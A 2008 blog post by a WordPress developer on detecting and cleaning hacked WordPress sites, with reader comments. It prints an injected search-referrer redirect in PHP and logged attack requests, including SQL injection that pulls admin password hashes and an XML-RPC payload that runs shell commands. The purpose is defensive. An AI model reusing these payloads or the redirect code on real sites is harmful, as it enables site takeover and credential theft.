Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.
Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.
In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net
If you’ve been hacked
- Upgrade to the latest version of WordPress.
- Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
- Change your passwords after upgrading and make sure the hacker didn’t create another user.
- Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
define(’SECRET_KEY’, ‘1234567890′ );
Hidden Code
The bad guys are using a number of ways to hide their hacks:
- The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the
eval()command, orbase64_decode(). Here’s a code snippet taken from here:
< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>< ?php
Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.
- Check your .htaccess file in the root of you blog. If you’ve never edited it, it’ll should look like this:
# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPressThat file may have this chunk of code too which is to do with the uploader:
<ifmodule mod_security.c>
<files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</files>
</ifmodule> - They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
- Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
- Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like
../uploads/2008/05/04/jhjyahjhnjnva.jpg
. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again. - Check your uploads directory for that jpg file and delete it.
- This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.
Change Your Passwords
Once you’ve upgraded and verified that your install is clean again you must do the following:
- Change the passwords of all users on your system.
- Make sure the hacker hasn’t added another user account he can use to login again.
Stop the bad guys
One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).
- I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
- The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):
# apt-get install aide
# vi /etc/aide/aide.conf.d/88_aide_web
# /usr/sbin/aideinitIn the configuration file above I put the following:
/home/web/ Checksums
!/home/www/logs/.*
!/home/web/public_html/wp-content/cache/.*
!/home/web/.*/htdocs/wp-content/cache/.*That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.
Please Upgrade
There is absolutely no reason not to upgrade. WordPress is famous for it’s 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.
Help a friend
Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:
<meta name=”generator” content=”WordPress 2.5.1″ /> <!– leave this for stats –>
What does a hack look like?
I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.
Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.
- First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
- Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
POST: Array
(
[cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
) - When that fails, he grabs xmlrpc.php.
- He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.
HTTP_RAW_POST_DATA: <?xml version=”1.0″?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
<member><name>params</name><value><array><data>
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
</data></array></value></member></blockquote>
- That fails too so the query is repeated with similar SQL.
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
- Then he tries a trackback:
URL: /wp-trackback.php?tb_id=1
POST: Array
(
[title] => 1
[url] => 1
[blog_name] => 1
[tb_id] => 666666\’
[1740009377] => 1
[496546471] => 1
) - And another trackback:
URL: /wp-trackback.php?p=1
POST: Array
(
[url] => ekibastos
[title] => ekibastos
[excerpt] => ekibastos
[blog_name] => +AFw-\’)/*
[charset] => UTF-7
) - Before finally going back to xmlrpc.php with this POST request:
<?xml version=”1.0″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>k1b0rg’ icq: 76-86-20</string></value></param>
<param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
<param><value><string>admin</string></value></param>
</params>
</methodCall> - In between, he also tries the following GET requests:
GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1 - Thankfully I upgraded and all those attacks fail.
Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.
PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.
<?xml version="1.0"?>
<methodCall>
<methodName>test.method
</methodName>
<params>
<param>
<value><name>','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*</name></value>
</param>
</params>
</methodCall>
Edit: Tripwire url fixed, thanks Callum
PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.
If you like this post then please subscribe to my full RSS feed. You can also click here to subscribe by email. There are also my fabulous photos and funny videos to explore too!
This is the personal blog of Donncha O Caoimh, Irish WordPress developer and sometimes Photographer.
Thanks. I checked the server version of the index.php file in the default themes folder, and it has not been modified since two weeks ago, so that should rule it out. I uploaded the one from my local machine to write over it just to be sure. I also reviewed all the modification dates of every non database file on the remote server, and nothing was modified since the search string hack attempt I posted. If you can think of anything else, please let me know. And in any event, thanks for the fast reply and the help. Greg
[...] these hacking problems and how to further protect yourselves from it, please read the detailed article made by Donncha O Caoimh, an Irish WordPress developer. In the meantime, I’ll be busy backing [...]
[...] these hacking problems and how to further protect yourselves from it, please read the detailed article made by Donncha O Caoimh, an Irish WordPress [...]
[...] Googling a number of times, I found this post which I think explains what happened to my site. I tried updating to the newest version but still, [...]
I just wanted to add that in many cases its good to have a second layer of protection that includes the protection of the plugins etc.
I strongly recommend phpids for this, its a software for php 5.2.x that protects scripts against almost all sql injections and xss attacks;)
Regards,
Malicious
[...] til blogg, ftp og database. For andre WordPress bloggere vil jeg anbefalte å ta en titt på dette innlegget. (Takk til Kristin for linken via [...]
Thank you very much for making this post! It was very helpful.
Thanks for the great content! I had to go through my entire database, post by post to find the hidden iframes code the hacker left behind!
Hopefully now I have resolved the problem. Thanks again.
I am a perfect n00b and my group pf blogs were hacked. I was using on them all WordPress 2.7 and I had long passwords like: Uh5″ôD$id?!MS) but It was hacked yesterday and I am still trying to make them work. My hosting company midphase.com helped me to get one of ‘em online and running but the others remain hacked: miautoculiacan.com the content is there and I can enter the admin panel with my password and I am just trying to understand everything. My .htaccess reads like this:
# -FrontPage-
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
order deny,allow
deny from all
allow from all
order deny,allow
deny from all
AuthName http://www.internetpymes.com
AuthUserFile /home/intebas7/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/intebas7/public_html/_vti_pvt/service.grp
# BEGIN WordPress
# END WordPress
Where do I keep looking? Am I in the right direction?
Digital Debris is all fixed – nightmare though, I really recommend this if it ever happens to you http://is.gd/eV4F in fact check now
[...] http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] seperti di sini atau di sini. Atau ada tutorial lain lebih lengkap untuk kasus yang agak beda di sini atau reference dari blog ShoeMoney dengan kasus hampir mirip di sini dan lain-klain tentu di [...]
[...] those of you who want more: Read an interesting article about a Wordpress blog being [...]
[...] installs : If you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]
[...] Click here to read post [...]
[...] du dig hotad? Besök Holy Shmoly! för mer [...]
Yes, my custom hosted wordpress blog was hacked back in 2007. Talk about heartbreak – I got my first writing job based on that blog!
I’m tentatively back on the wordpress train but only on wordpress.com which points to my own domain name.
[...] you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]
Recently started up a blog and was happy when I started getting listed on google and seeing referrals coming there. Then as quickly as the search results came they disappeared. I noticed googlebot indexing my site last night. Are these fluctuations normal on a new website? I have checked my site for the problems you mention here and it appears to be clean with the latest version of wordpress installed. Thanks for the information and great blog by the way!
[...] Actualización 17-03-09: Todos los problemas han sido arreglados. Finalmente NO fue un fallo de Wordpress, sino que otra de las personas que comparte el servidor con nosotros instaló algún tipo de aplicación de dudosa seguridad y muy probablemente eso permitió que se accediera al servidor y añadieran código malicioso a muchos de los archivos php de mi instalación de Wordpress. La solución a todo esto me la han facilitado desde el hilo que abrí en el foro de soporte técnico de Wordpress, por lo que dejo aquí en el enlace para todo aquel al que pueda servirle de ayuda en caso de haber padecido este mismo ataque. Concretamente, la web que proporciona las soluciones es: http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] BlogSecurity is a blog that provides information about maintaining Wordpresss Security. Holy Shmoly has a great blog post entitled “Did your Wordpress Blog Get Hacked?” and it provides a [...]
[...] i miei siti: “Exploit Redirects Googlebot to Malware Sites (Bablo me uk)” e “Did your WordPress site get hacked?“, piuttosto [...]
[...] this was quite a challenging task as I wasn’t sure what or where to look. I found this article which gave a few pointers. I have yet to follow all the instructions but this is what I’ve [...]
[...] you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]
Je lis : Holy Shmoly! » Did your WordPress site get hacked? http://tinyurl.com/4orj9h
@Veneficusunus has your wordpress installation been hacked http://tinyurl.com/4orj9h
wordpress 2.7.1 de açık ? http://tinyurl.com/de2pl2 http://tinyurl.com/4orj9h
[...] İlk olarak wordpressin son sürümünü indirin ve sistem dosyalarını bir güzel yenileriyle değiştirin. Sonra sonradan eklenen dosylardaki (tema, eklenti gibi) zararlı kodları temizleyin. Web siteniz ile en ilgili olandan başlayıp bütün şifrelerinizi değiştirin. Kaliteli ve kullanışlı şifreleri üretmeyi öğrenin. Bu biraz ironik ama windowsunuzu güvenli tutun. Neyseki bu olay bir tek benim başıma gelmemiş. Eğer sizde bu durumla baş başa iseniz aşağıdaki linklerden faydalanabilirsiniz ; http://wordpress.org/support/topic/263085 http://wordpress.org/support/topic/261886 http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] You can read more about .htaccess from here. I checked my blog and it was working fine. CallingAllGeeks was up and running again. So, in all it [...]
Hi, i created a sub folder in my server to test wordpress. it was just 10 days and then some files in that folders are deleted except wp_content folder, wp_includes folder and and wp_register.php… also some of the other folders and files are deleted in the root folder. will word press hack deletes files other than the wordpress files??? also the files are read write mode. so
Some great information here, many thanks to all.
I do try to keep up with the latest versions on all my sites, including plugins, but have to admit that i’m sometimes a bit irregular with my backups.
Luckily, everytime i’ve been hacked (about 30 times across 40 sites in the last 12 months), no damage has been done.
Thanks again for the tips.
Darn,
I’ve been hacked with 2.6.5 last year, and just recently with 2.7 on a couple of my sites. It’s extremely annoying, as those were ones on shared shoting packages that don’t let me upgrade automatically. It’s pure laziness on my part that I didn’t do it, all my other sites are 2.7.1 and don’t have a problem.
Note to self: UPGRADE
Other Note to self: once you’re done editing theme and plugin files, set file permissions back to 755 for god’s sake!
Thanks for the article
[...] http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
this is a cool background. is it jQuery based theme ? sorry to bother
Some great information here, many thanks to all.
I do try to keep up with the latest versions on all my sites, including plugins, but have to admit that i’m sometimes a bit irregular with my backups.
Luckily, everytime i’ve been hacked (about 30 times across 40 sites in the last 12 months), no damage has been done.
john.
[...] være på bloggen din, kan du gå igjennom denne listen. Vil du vite hvordan en hacker jobber, er denne siden litt grei å lese, men dog veldig [...]
[...] enough as we’re all vulnerable here. If you’re more tech savvy, here’s a post by Holy Shmoly! which tacles hacked php scripts on WordPress and how they look [...]
[...] Open source Exploits The open source platforms are now an easy target for hackers to exploit and use the malicious codes. The last thing that we need is a hacked site with a very good SERP. If you are interested in a serious article this is the place to go. http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] spam. No estoy segura de haber limpiado todo lo que tenía que limpiar. Pero hice lo que pude. Aquí hay más información para verificar si tienen el mismo problema. (Tu no Javi, ya confirme que no tuvieras el mismo [...]
[...] Did your WordPress site get hacked? [...]
[...] Well, it was clearly a bad news : the site ajaxplorer.info was hacked during on the 13 july 2009, naturally just the night before an important gig, so I had to put it down for a few days. But the good news is that it had nothing to do with the AjaXplorer installed on the server, but it was a wordpress security problem. My fault, i had not updated the wordpress install, and I will right now subscribe the wordpress rss feed telling urging to upgrade when they find a problem. For those using wordpress, have a look here if you don’t have updated already : http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] Did your WordPress site get hacked? [...]
Check out http://wordpress.org/support/topic/307588 – someone had changed my permalinks set-up. Need to do a thorough check-up on everything else… http://codex.wordpress.org/Hardening_WordPress is my next port of call.
We also got hit
Our press release section got screwed over by the hacker.
We did also think about the issue of restoring your permalinks, and the need to do them EXACTLY as they were in the past, to avoid loss of search engine results, and possibly traffic… Most people have easy to remember permalinks, but for people that don’t, and who are silly enough not to have the structure backed up (cough) then here is a guide: http://www.kingpin-seo.co.uk/press-releases/how-to-recover-your-permalinks-settings-to-get-your-indexed-posts-back-dont-loose-google-serps/116611
Hope you don’t mind me linking to it! – Not trying to spam you guys, just trying to help bloggers avoid SERP loss.
[...] Found another older post, but more good suggestions there. For example, I did review my .htaccess file and found it a bit [...]
[...] this hack news from June 2008 or March 2007 But this news .. news .. news .. news [...]
[...] recently, I followed some of the steps mentioned by Jaypee, Donncha O Caoimh and the WP [...]
Great info! Thanks for the information. Fortunately, I upgraded before being hacked. However, there are some best practices that I need to update my site with.
BTW…love the WP-Supercache plugin. Thanks!!!
I may have been hacked, at the very least I had people add themselves as users, never got to the ADMIN point I think, but I did find this in my php code… I use the revolution theme… and am not sure if this should be there or not.
There doesn’t appear to be anything wrong with the site or pages but here is the code:
SELECT *
FROM `DatabasenameXXXXXXXXXXXX`.`wp_options`
WHERE (
`option_id` LIKE ‘%base64_decode%’
OR `blog_id` LIKE ‘%base64_decode%’
OR `option_name` LIKE ‘%base64_decode%’
OR `option_value` LIKE ‘%base64_decode%’
OR `autoload` LIKE ‘%base64_decode%’
)
LIMIT 0 , 30
Am I ok.. or did something happen?
Great piece! Looks like I was hacked today! I’ve upgraded to the new WP but the problem I’m having is that when I go to admin – posts – it tells me there are no posts found – but the numeric line above it states that there are posts. My categories are also missing.
Any suggestions as to where to look? Please help!!!!!!
Thanks,
Hi there
) Looking desperatetly for help 
I cannot even get into my blog b/c the worm or whatever has deleted my admin user and now all my posts are gone etc. How do I even get back into my blog to delete the hacker user and start to clean up. Do I do this from FTP? Do I upgrade first? And where exactly do I look for these codes (through my cpanel) or do I go into my blog admin and look at code there? I have a prophoto2 theme blog. Thank you so much. I am worried that the virus will not stop and eat up my whole blog – it is still there for now with header etc, just no posts. Can you please help me?? I’d be so grateful. Thank you 
)
My wordpress blog was hacked too, my permalink structure was default but it changed to a funky one when it was hacked by this worm, and a pretty simple fix is to to click the default permalink structure again and click save changes, now your posts should be working again, mine start working again.
I admit, i had to upgrade my blog for many months, but i am too lazy for some things sometimes, but not anymore, now i got smarter, way smarter to be hacked again.
Thank you for all these useful informations. Unfortunately it`s a matter of time until a Wordpress blog will be attacked by hackers, in a form or other. The main rule is a constantly DB backup. Upgrade your WP and the plugins when it`s possible, try to protect as much you can, in this article you can find useful details, but don`t forget, secure your important dates by regular backups.
For the sake of helping of course, i want to say something else.
When i was hacked, i mentioned that my permalink structure was hacked, it was literally changed to a very complex one, fortunately it was not working in terms of real and active links, i guess the hacker who wrote the worm did not want to make damage, real and extensive damage i mean, i guess he wanted only to scare people into upgrading your wordpress blog which makes me think a lot, i mean, who would want to scare every wordpress blog user in to upgrading to the latest patch!!!?
But the permalink structure hacked was not all, my theme files were hacked too, my footer php file was hacked, they inserted a large number of links to spam stuff, which by the way, really damaged my google search engine position and perhaps even my page rank position too, in the long run of course, and that happened because the guy used a very common flaw everyone does, and wordpress has fault on that, i explain in the next paragraph.
If you go to the theme editor in the appereance menu, you know or you should know that you can edit your theme files or any other file from your wordpress installation on your wordpress control panel appearance online editor, and for that, you must first change mod the file permissions of the files you want to edit, i mean, change to be writable so that the online wordpress file editor can edit, but that is a major flaw because nobody will change mode the files permissions again to what value they were with, and with a XSS attack or some xmlrpc trackback attack method, hackers could create worms or just pieces of code to insert malware code in to the files you just change permissions to writable.
Another flaw people still use in wordpress blogs and others is the XMLRPC protocol, that must be deleted from blogs, it is so insecure that it is just another flaw that hackers use to hack or deface a wordpress blog, so the main patch is for you to delete the xmlrpc.php file from your wordpress root installation directory, beleave me, i really informed myself on this, delete it and deactive the service by going to the wordpress control panel, then in general options in some menu i can not recall the name, just browse through all and set it off, you do not need that.
Hope i helped.
[...] Did your Wordpress site get hacked? [...]
Someone changing my urls like
Orgional URL’ were
http://mydomain.com/2009/08/14/my-post/
changed url
mydomain.com/?p=68
Please advice how to prevent this
Several of my sites were exploited some a hacker recently. As far as I am aware the hack used the wordpress php vunrability to gain access to my server and rather than creating havoc with wordpess files appears to have defaced one of my html sites by deleting the home page and uploading his or hers own stupid home page. So, in this case they used wordpress to gain entry but did not do anything only deface an unrelated non wordpress site. Upgraded wordpress, all plugins and installed a firewall which seems to be doing its job of blocking further attacks given the emails I get from them once a week stating I have again fallen victim! changed all passwords, ftp,admin,sql and any other I could think off! it really is not nice being hacked and is a real pain in the rear so ensure you back up often and install a firewall – if you have one they will simply move on to another blog which does not so its a good deterrent.
[...] advice: Holy Shmoly! and My Digital [...]
Someone changing my urls like
Orgional URL’ were
http://mydomain.com/2009/08/14/my-post/
changed url
mydomain.com/?p=68
How they changed it…any clue
As a JustHost user I installed WordPress (previous version) as first time user, via cPanel – Fantastico.
Everything worked well, upgraded immediately for WP 2.8.4 security upgrade via WP Dashboard, which subsequently displayed WordPress 2.8.4.
Henceforth, I thought I was running with WP 2.8.4.
That is, until yesterday!
cPanel – Fantastico | WordPress
displayed in RED upgrade now to WP 2.8.4
Shock horror!
Install by Fantastico and it controls WordPress.
Upgrades by WP Wordpress do not update.
Warning:
WordPress upgrades – immediate.
Fantastic WP upgrades – timing delay, therefore, security risk.
My site been hacked.
I found the following injected code on my wordpress theme footer.php
if (!isset($_COOKIE["tll"])) echo “”;
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] How To Completely Clear Your Hacked WordPress Installation Hardening WordPress Did Your WordPress Site Get Hacked? 20 WordPress Security Plugins (don’t overdo it, though) Share this on del.icio.usDigg this!Share [...]
My site and blog were also hacked by the latest wordpress worm. It’s important to also look in your sql database, particularly in the wp_users category: if you’re the only admin, there should only be records that pertain to you (tagged with “1″); all others should be deleted. Also check the users meta data: this is where I found a JS file that contained hidden redirect code. Another place is the “uploads” folder: you may find a cached javascript file that shouldn’t be there, or a tinymce.gz file: delete both. Check your blog/database daily after you install a clean copy to make sure it stays clean.
THank you so much for this article. I’ve recently been hacked with HIDDEN Spam links in my header.
I did find a bunch of ‘fake’ users in my Users file in myPHPadmin and deleted them.
Then i changed my WP name/password.
But the links came back a week later.
Now i see a bunch of suspicious stuff in my Users Metadata file in myphpadmin.
ROSACEA:
How do i know what is safe to delete??
I feel like I am flying blind.
Any other tips will be appreciated.
Run the exploit scanner plugin to find the backdoor that has been installed on your system!
Hi Donncha-
Thank you SO much for replying to me. SO even though i keep deleting these hidden links from my header.php and then re upload the original header.php and i’ve changed usernames and passwords for both WP and Blue host…the hidden links keep returning!!!
I’ve also deleted fake users and some odd user metadata.
Now, i ran your Exploit Plug in and this:
<?php eval(gzinflate(base64_decode('1VVtT9swEP7c/…
…plus a bunch of script comes up in what appears to be every plug in.
It also found so many other things: (eval…display: none;…<iframe)…String.fromCharCode) i don't know what's okay and what is not. I am no expert. Please help. What do i do next? Thank you so much!!
Lisa
[...] you think you’ve been hacked, I’ve spotted a couple of useful guides to dealing with the aftermath. Wordpress, php hack, php, security, [...]